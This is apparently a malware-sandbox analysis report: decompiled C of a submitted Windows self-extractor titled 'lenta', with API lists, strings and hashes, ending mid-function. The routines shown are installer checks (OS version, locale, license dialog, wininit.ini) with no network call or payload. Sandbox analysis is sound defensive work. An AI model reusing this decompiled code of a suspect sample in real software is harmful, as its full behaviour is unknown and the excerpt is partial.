                                                                                                                                                                                                                                            				int* _v176;
                                                                                                                                                                                                                                            				int _v180;
                                                                                                                                                                                                                                            				int _v184;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t19;
                                                                                                                                                                                                                                            				long _t31;
                                                                                                                                                                                                                                            				signed int _t35;
                                                                                                                                                                                                                                            				void* _t36;
                                                                                                                                                                                                                                            				intOrPtr _t41;
                                                                                                                                                                                                                                            				signed int _t44;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t36 = __ebx;
                                                                                                                                                                                                                                            				_t19 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            				_v8 = _t19 ^ _t44;
                                                                                                                                                                                                                                            				_t41 =  *0xa981d8; // 0xfffffffe
                                                                                                                                                                                                                                            				_t43 = 0;
                                                                                                                                                                                                                                            				_v180 = 0xc;
                                                                                                                                                                                                                                            				_v176 = 0;
                                                                                                                                                                                                                                            				if(_t41 == 0xfffffffe) {
                                                                                                                                                                                                                                            					 *0xa981d8 = 0;
                                                                                                                                                                                                                                            					_v168.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                                                            					if(GetVersionExA( &_v168) == 0) {
                                                                                                                                                                                                                                            						L12:
                                                                                                                                                                                                                                            						_t41 =  *0xa981d8; // 0xfffffffe
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t41 = 1;
                                                                                                                                                                                                                                            						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                                                                                                                                                                                            							goto L12;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t31 = RegQueryValueExA(_v172, 0xa91140, 0,  &_v184,  &_v20,  &_v180);
                                                                                                                                                                                                                                            							_t43 = _t31;
                                                                                                                                                                                                                                            							RegCloseKey(_v172);
                                                                                                                                                                                                                                            							if(_t31 != 0) {
                                                                                                                                                                                                                                            								goto L12;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t40 =  &_v176;
                                                                                                                                                                                                                                            								if(E00A966F9( &_v20,  &_v176) == 0) {
                                                                                                                                                                                                                                            									goto L12;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t35 = _v176 & 0x000003ff;
                                                                                                                                                                                                                                            									if(_t35 == 1 || _t35 == 0xd) {
                                                                                                                                                                                                                                            										 *0xa981d8 = _t41;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										goto L12;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A96CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                                            0x00a9681f
                                                                                                                                                                                                                                            0x00a9682a
                                                                                                                                                                                                                                            0x00a96831
                                                                                                                                                                                                                                            0x00a96836
                                                                                                                                                                                                                                            0x00a9683c
                                                                                                                                                                                                                                            0x00a9683e
                                                                                                                                                                                                                                            0x00a96848
                                                                                                                                                                                                                                            0x00a96851
                                                                                                                                                                                                                                            0x00a9685d
                                                                                                                                                                                                                                            0x00a96864
                                                                                                                                                                                                                                            0x00a96876
                                                                                                                                                                                                                                            0x00a9693a
                                                                                                                                                                                                                                            0x00a9693a
                                                                                                                                                                                                                                            0x00a9687c
                                                                                                                                                                                                                                            0x00a9687e
                                                                                                                                                                                                                                            0x00a96885
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a968d6
                                                                                                                                                                                                                                            0x00a968f4
                                                                                                                                                                                                                                            0x00a96900
                                                                                                                                                                                                                                            0x00a96902
                                                                                                                                                                                                                                            0x00a9690a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9690c
                                                                                                                                                                                                                                            0x00a9690c
                                                                                                                                                                                                                                            0x00a9691c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9691e
                                                                                                                                                                                                                                            0x00a96924
                                                                                                                                                                                                                                            0x00a9692b
                                                                                                                                                                                                                                            0x00a96932
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9692b
                                                                                                                                                                                                                                            0x00a9691c
                                                                                                                                                                                                                                            0x00a9690a
                                                                                                                                                                                                                                            0x00a96885
                                                                                                                                                                                                                                            0x00a96876
                                                                                                                                                                                                                                            0x00a96951

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00A9686E
                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(0000004A), ref: 00A968A7
                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00A968CC
                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,00A91140,00000000,?,?,0000000C), ref: 00A968F4
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00A96902
                                                                                                                                                                                                                                              • Part of subcall function 00A966F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,00A9691A), ref: 00A96741
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • Control Panel\Desktop\ResourceLocale, xrefs: 00A968C2
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                                                            • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                                                            • API String ID: 3346862599-1109908249
                                                                                                                                                                                                                                            • Opcode ID: 394f5b5b3d6bf70c7fae195a11315303d4fee2daabbb5c9c992bbd3717dedee9
                                                                                                                                                                                                                                            • Instruction ID: f31bc48d3086a8524752c9bac01b5c9b7f8d7cc2cbc704b9ac50040698d54771
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 394f5b5b3d6bf70c7fae195a11315303d4fee2daabbb5c9c992bbd3717dedee9
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C7314F31B002289FDF21CB55CC45FAAB7F8EF46764F1001A7E949A6250DF319E86CB92
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A93A3F(void* __eflags) {
                                                                                                                                                                                                                                            				void* _t3;
                                                                                                                                                                                                                                            				void* _t9;
                                                                                                                                                                                                                                            				CHAR* _t16;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t16 = "LICENSE";
                                                                                                                                                                                                                                            				_t1 = E00A9468F(_t16, 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                            				_t3 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                                                            				 *0xa98d4c = _t3;
                                                                                                                                                                                                                                            				if(_t3 != 0) {
                                                                                                                                                                                                                                            					_t19 = _t16;
                                                                                                                                                                                                                                            					if(E00A9468F(_t16, _t3, _t28) != 0) {
                                                                                                                                                                                                                                            						if(lstrcmpA( *0xa98d4c, "<None>") == 0) {
                                                                                                                                                                                                                                            							LocalFree( *0xa98d4c);
                                                                                                                                                                                                                                            							L9:
                                                                                                                                                                                                                                            							 *0xa99124 = 0;
                                                                                                                                                                                                                                            							return 1;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t9 = E00A96517(_t19, 0x7d1, 0, E00A93100, 0, 0);
                                                                                                                                                                                                                                            						LocalFree( *0xa98d4c);
                                                                                                                                                                                                                                            						if(_t9 != 0) {
                                                                                                                                                                                                                                            							goto L9;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *0xa99124 = 0x800704c7;
                                                                                                                                                                                                                                            						L2:
                                                                                                                                                                                                                                            						return 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					E00A944B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					LocalFree( *0xa98d4c);
                                                                                                                                                                                                                                            					 *0xa99124 = 0x80070714;
                                                                                                                                                                                                                                            					goto L2;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				E00A944B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            				 *0xa99124 = E00A96285();
                                                                                                                                                                                                                                            				goto L2;
                                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                                            0x00a93a46
                                                                                                                                                                                                                                            0x00a93a57
                                                                                                                                                                                                                                            0x00a93a5d
                                                                                                                                                                                                                                            0x00a93a63
                                                                                                                                                                                                                                            0x00a93a6a
                                                                                                                                                                                                                                            0x00a93a91
                                                                                                                                                                                                                                            0x00a93a9a
                                                                                                                                                                                                                                            0x00a93ad8
                                                                                                                                                                                                                                            0x00a93b13
                                                                                                                                                                                                                                            0x00a93b19
                                                                                                                                                                                                                                            0x00a93b1b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93b21
                                                                                                                                                                                                                                            0x00a93ae7
                                                                                                                                                                                                                                            0x00a93af4
                                                                                                                                                                                                                                            0x00a93afc
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93afe
                                                                                                                                                                                                                                            0x00a93a87
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93a87
                                                                                                                                                                                                                                            0x00a93aa8
                                                                                                                                                                                                                                            0x00a93ab3
                                                                                                                                                                                                                                            0x00a93ab9
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93ab9
                                                                                                                                                                                                                                            0x00a93a78
                                                                                                                                                                                                                                            0x00a93a82
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946A0
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: SizeofResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946A9
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946C3
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: LoadResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946CC
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: LockResource.KERNEL32(00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946D3
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: memcpy_s.MSVCRT ref: 00A946E5
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946EF
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00A92F64,?,00000002,00000000), ref: 00A93A5D
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00A93AB3
                                                                                                                                                                                                                                              • Part of subcall function 00A944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A94518
                                                                                                                                                                                                                                              • Part of subcall function 00A944B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A94554
                                                                                                                                                                                                                                              • Part of subcall function 00A96285: GetLastError.KERNEL32(00A95BBC), ref: 00A96285
                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(<None>,00000000), ref: 00A93AD0
                                                                                                                                                                                                                                            • LocalFree.KERNEL32 ref: 00A93B13
                                                                                                                                                                                                                                              • Part of subcall function 00A96517: FindResourceA.KERNEL32(00A90000,000007D6,00000005), ref: 00A9652A
                                                                                                                                                                                                                                              • Part of subcall function 00A96517: LoadResource.KERNEL32(00A90000,00000000,?,?,00A92EE8,00000000,00A919E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00A96538
                                                                                                                                                                                                                                              • Part of subcall function 00A96517: DialogBoxIndirectParamA.USER32(00A90000,00000000,00000547,00A919E0,00000000), ref: 00A96557
                                                                                                                                                                                                                                              • Part of subcall function 00A96517: FreeResource.KERNEL32(00000000,?,?,00A92EE8,00000000,00A919E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00A96560
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00A93100,00000000,00000000), ref: 00A93AF4
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                                                            • String ID: <None>$LICENSE
                                                                                                                                                                                                                                            • API String ID: 2414642746-383193767
                                                                                                                                                                                                                                            • Opcode ID: 5dd9b33733a6134fc8fcedc9212ac86a0621f30e4472906338b0df425df045af
                                                                                                                                                                                                                                            • Instruction ID: 98318f727bb73aafedb58aeede02570f0399a171cc3d43f1c67c1eca53528564
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5dd9b33733a6134fc8fcedc9212ac86a0621f30e4472906338b0df425df045af
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4E1187713002017BDF20EBB69D09E1B39F9EBD9B40B10452FB545D95E1DE7D88028664
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                            			E00A924E0(void* __ebx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t7;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				long _t26;
                                                                                                                                                                                                                                            				signed int _t27;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t20 = __ebx;
                                                                                                                                                                                                                                            				_t7 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            				_v8 = _t7 ^ _t27;
                                                                                                                                                                                                                                            				_t25 = 0x104;
                                                                                                                                                                                                                                            				_t26 = 0;
                                                                                                                                                                                                                                            				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                            					E00A9658A( &_v268, 0x104, "wininit.ini");
                                                                                                                                                                                                                                            					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                                                                                                                                                                                            					_t25 = _lopen( &_v268, 0x40);
                                                                                                                                                                                                                                            					if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                            						_t26 = _llseek(_t25, 0, 2);
                                                                                                                                                                                                                                            						_lclose(_t25);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A96CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                                            0x00a924e0
                                                                                                                                                                                                                                            0x00a924eb
                                                                                                                                                                                                                                            0x00a924f2
                                                                                                                                                                                                                                            0x00a924f7
                                                                                                                                                                                                                                            0x00a92504
                                                                                                                                                                                                                                            0x00a9250e
                                                                                                                                                                                                                                            0x00a9251d
                                                                                                                                                                                                                                            0x00a9252c
                                                                                                                                                                                                                                            0x00a92541
                                                                                                                                                                                                                                            0x00a92546
                                                                                                                                                                                                                                            0x00a92553
                                                                                                                                                                                                                                            0x00a92555
                                                                                                                                                                                                                                            0x00a92555
                                                                                                                                                                                                                                            0x00a92546
                                                                                                                                                                                                                                            0x00a9256c

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00A92506
                                                                                                                                                                                                                                            • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 00A9252C
                                                                                                                                                                                                                                            • _lopen.KERNEL32 ref: 00A9253B
                                                                                                                                                                                                                                            • _llseek.KERNEL32(00000000,00000000,00000002), ref: 00A9254C
                                                                                                                                                                                                                                            • _lclose.KERNEL32(00000000), ref: 00A92555
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                                                            • String ID: wininit.ini
                                                                                                                                                                                                                                            • API String ID: 3273605193-4206010578
                                                                                                                                                                                                                                            • Opcode ID: f274ff481c6bee733d8d05c8a2082352ddf8c4704a90475eaffe8349a4bdad96
                                                                                                                                                                                                                                            • Instruction ID: 357c63d99e9016ce82ebfe238483f70368993fbcd5c6f908e5f4cfa7ded4f3b6
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f274ff481c6bee733d8d05c8a2082352ddf8c4704a90475eaffe8349a4bdad96
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8C01523670011867CB20EBA59D09EDB7BBCEB95750F010166FA49D3190DE748E46CAD1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                                                                                                            			E00A936EE(CHAR* __ecx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				struct _OSVERSIONINFOA _v416;
                                                                                                                                                                                                                                            				signed int _v420;
                                                                                                                                                                                                                                            				signed int _v424;
                                                                                                                                                                                                                                            				CHAR* _v428;
                                                                                                                                                                                                                                            				CHAR* _v432;
                                                                                                                                                                                                                                            				signed int _v436;
                                                                                                                                                                                                                                            				CHAR* _v440;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t72;
                                                                                                                                                                                                                                            				CHAR* _t77;
                                                                                                                                                                                                                                            				CHAR* _t91;
                                                                                                                                                                                                                                            				CHAR* _t94;
                                                                                                                                                                                                                                            				int _t97;
                                                                                                                                                                                                                                            				CHAR* _t98;
                                                                                                                                                                                                                                            				signed char _t99;
                                                                                                                                                                                                                                            				CHAR* _t104;
                                                                                                                                                                                                                                            				signed short _t107;
                                                                                                                                                                                                                                            				signed int _t109;
                                                                                                                                                                                                                                            				short _t113;
                                                                                                                                                                                                                                            				void* _t114;
                                                                                                                                                                                                                                            				signed char _t115;
                                                                                                                                                                                                                                            				short _t119;
                                                                                                                                                                                                                                            				CHAR* _t123;
                                                                                                                                                                                                                                            				CHAR* _t124;
                                                                                                                                                                                                                                            				CHAR* _t129;
                                                                                                                                                                                                                                            				signed int _t131;
                                                                                                                                                                                                                                            				signed int _t132;
                                                                                                                                                                                                                                            				CHAR* _t135;
                                                                                                                                                                                                                                            				CHAR* _t138;
                                                                                                                                                                                                                                            				signed int _t139;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t72 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            				_v8 = _t72 ^ _t139;
                                                                                                                                                                                                                                            				_v416.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                                                            				_t115 = __ecx;
                                                                                                                                                                                                                                            				_t135 = 0;
                                                                                                                                                                                                                                            				_v432 = __ecx;
                                                                                                                                                                                                                                            				_t138 = 0;
                                                                                                                                                                                                                                            				if(GetVersionExA( &_v416) != 0) {
                                                                                                                                                                                                                                            					_t133 = _v416.dwMajorVersion;
                                                                                                                                                                                                                                            					_t119 = 2;
                                                                                                                                                                                                                                            					_t77 = _v416.dwPlatformId - 1;
                                                                                                                                                                                                                                            					__eflags = _t77;
                                                                                                                                                                                                                                            					if(_t77 == 0) {
                                                                                                                                                                                                                                            						_t119 = 0;
                                                                                                                                                                                                                                            						__eflags = 1;
                                                                                                                                                                                                                                            						 *0xa98184 = 1;
                                                                                                                                                                                                                                            						 *0xa98180 = 1;
                                                                                                                                                                                                                                            						L13:
                                                                                                                                                                                                                                            						 *0xa99a40 = _t119;
                                                                                                                                                                                                                                            						L14:
                                                                                                                                                                                                                                            						__eflags =  *0xa98a34 - _t138; // 0x0
                                                                                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                                                                                            							goto L66;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						__eflags = _t115;
                                                                                                                                                                                                                                            						if(_t115 == 0) {
                                                                                                                                                                                                                                            							goto L66;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_v428 = _t135;
                                                                                                                                                                                                                                            						__eflags = _t119;
                                                                                                                                                                                                                                            						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                                                                                                                                                                                                            						_t11 =  &_v420;
                                                                                                                                                                                                                                            						 *_t11 = _v420 & _t138;
                                                                                                                                                                                                                                            						__eflags =  *_t11;
                                                                                                                                                                                                                                            						_v440 = _t115;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_v424 = _t135 * 0x18;
                                                                                                                                                                                                                                            							_v436 = E00A92A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                                                                                                                                                                                                            							_t91 = E00A92A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                                                                                                                                                                                                            							_t123 = _v436;
                                                                                                                                                                                                                                            							_t133 = 0x54d;
                                                                                                                                                                                                                                            							__eflags = _t123;
                                                                                                                                                                                                                                            							if(_t123 < 0) {
                                                                                                                                                                                                                                            								L32:
                                                                                                                                                                                                                                            								__eflags = _v420 - 1;
                                                                                                                                                                                                                                            								if(_v420 == 1) {
                                                                                                                                                                                                                                            									_t138 = 0x54c;
                                                                                                                                                                                                                                            									L36:
                                                                                                                                                                                                                                            									__eflags = _t138;
                                                                                                                                                                                                                                            									if(_t138 != 0) {
                                                                                                                                                                                                                                            										L40:
                                                                                                                                                                                                                                            										__eflags = _t138 - _t133;
                                                                                                                                                                                                                                            										if(_t138 == _t133) {
                                                                                                                                                                                                                                            											L30:
                                                                                                                                                                                                                                            											_v420 = _v420 & 0x00000000;
                                                                                                                                                                                                                                            											_t115 = 0;
                                                                                                                                                                                                                                            											_v436 = _v436 & 0x00000000;
                                                                                                                                                                                                                                            											__eflags = _t138 - _t133;
                                                                                                                                                                                                                                            											_t133 = _v432;
                                                                                                                                                                                                                                            											if(__eflags != 0) {
                                                                                                                                                                                                                                            												_t124 = _v440;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                                                                                                                                                                                                            												_v420 =  &_v268;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags = _t124;
                                                                                                                                                                                                                                            											if(_t124 == 0) {
                                                                                                                                                                                                                                            												_t135 = _v436;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												_t99 = _t124[0x30];
                                                                                                                                                                                                                                            												_t135 = _t124[0x34] + 0x84 + _t133;
                                                                                                                                                                                                                                            												__eflags = _t99 & 0x00000001;
                                                                                                                                                                                                                                            												if((_t99 & 0x00000001) == 0) {
                                                                                                                                                                                                                                            													asm("sbb ebx, ebx");
                                                                                                                                                                                                                                            													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													_t115 = 0x104;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags =  *0xa98a38 & 0x00000001;
                                                                                                                                                                                                                                            											if(( *0xa98a38 & 0x00000001) != 0) {
                                                                                                                                                                                                                                            												L64:
                                                                                                                                                                                                                                            												_push(0);
                                                                                                                                                                                                                                            												_push(0x30);
                                                                                                                                                                                                                                            												_push(_v420);
                                                                                                                                                                                                                                            												_push("lenta");
                                                                                                                                                                                                                                            												goto L65;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												__eflags = _t135;
                                                                                                                                                                                                                                            												if(_t135 == 0) {
                                                                                                                                                                                                                                            													goto L64;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												__eflags =  *_t135;
                                                                                                                                                                                                                                            												if( *_t135 == 0) {
                                                                                                                                                                                                                                            													goto L64;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												MessageBeep(0);
                                                                                                                                                                                                                                            												_t94 = E00A9681F(_t115);
                                                                                                                                                                                                                                            												__eflags = _t94;
                                                                                                                                                                                                                                            												if(_t94 == 0) {
                                                                                                                                                                                                                                            													L57:
                                                                                                                                                                                                                                            													0x180030 = 0x30;
                                                                                                                                                                                                                                            													L58:
                                                                                                                                                                                                                                            													_t97 = MessageBoxA(0, _t135, "lenta", 0x00180030 | _t115);
                                                                                                                                                                                                                                            													__eflags = _t115 & 0x00000004;
                                                                                                                                                                                                                                            													if((_t115 & 0x00000004) == 0) {
                                                                                                                                                                                                                                            														__eflags = _t115 & 0x00000001;
                                                                                                                                                                                                                                            														if((_t115 & 0x00000001) == 0) {
                                                                                                                                                                                                                                            															goto L66;
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            														__eflags = _t97 - 1;
                                                                                                                                                                                                                                            														L62:
                                                                                                                                                                                                                                            														if(__eflags == 0) {
                                                                                                                                                                                                                                            															_t138 = 0;
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            														goto L66;
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            													__eflags = _t97 - 6;
                                                                                                                                                                                                                                            													goto L62;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												_t98 = E00A967C9(_t124, _t124);
                                                                                                                                                                                                                                            												__eflags = _t98;
                                                                                                                                                                                                                                            												if(_t98 == 0) {
                                                                                                                                                                                                                                            													goto L57;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												goto L58;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										__eflags = _t138 - 0x54c;
                                                                                                                                                                                                                                            										if(_t138 == 0x54c) {
                                                                                                                                                                                                                                            											goto L30;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										__eflags = _t138;
